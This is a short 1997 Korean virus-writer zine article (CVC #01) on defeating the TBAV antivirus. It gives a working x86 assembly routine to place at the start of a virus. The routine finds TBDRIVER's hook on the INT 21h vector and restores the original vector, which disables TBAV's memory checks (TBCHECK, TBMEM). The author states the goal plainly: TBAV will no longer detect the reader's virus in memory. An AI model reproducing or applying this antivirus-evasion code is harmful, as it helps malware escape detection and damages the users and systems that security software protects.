
 TBAV 무력화                                                     CVC #01  97/06

---------------------------------------------------------------------> kiminwoo

 이번에는 강력한 백신(?)이라 불리는 TBAV 의 보호 기능을 무력
 화시키는 방법에 대해 써봐야 겠습니다.

 우선 TBAV가 로딩할때 검사하므로 바이러스의 맨 첫번째에 Call
 루틴을 집어넣으시는 것이 좋을듯 합니다.

 제가 한번 예를 들겠습니다..

begin:     call TBAV

             : :

TBAV:      xor   ax,ax
           mov   es,ax
           les   bx,[es:0084h]
           cmp   byte ptr es:[bx+2],0eah
           jnz   good
           push  word ptr es:[bx+3]
           push  word ptr es:[bx+5]
           mov   es,ax
           pop   word ptr es:[0086h]
           pop   word ptr es:[0084h]
good:      ret

우선 0000:0084에 TBAV마크를 확인한후에 엉망으로 만드는 루틴
입니다.정확히 말해서 TBDRIVER를 망가뜨리는 거죠.

그럼 TBCHECK TBMEM TB..등이 모두 무력화 됩니다.
이제부터는 TBAV가 절대 여러분의 바이러스를 체크 하지 못할겁
니다.(메모리에서만)

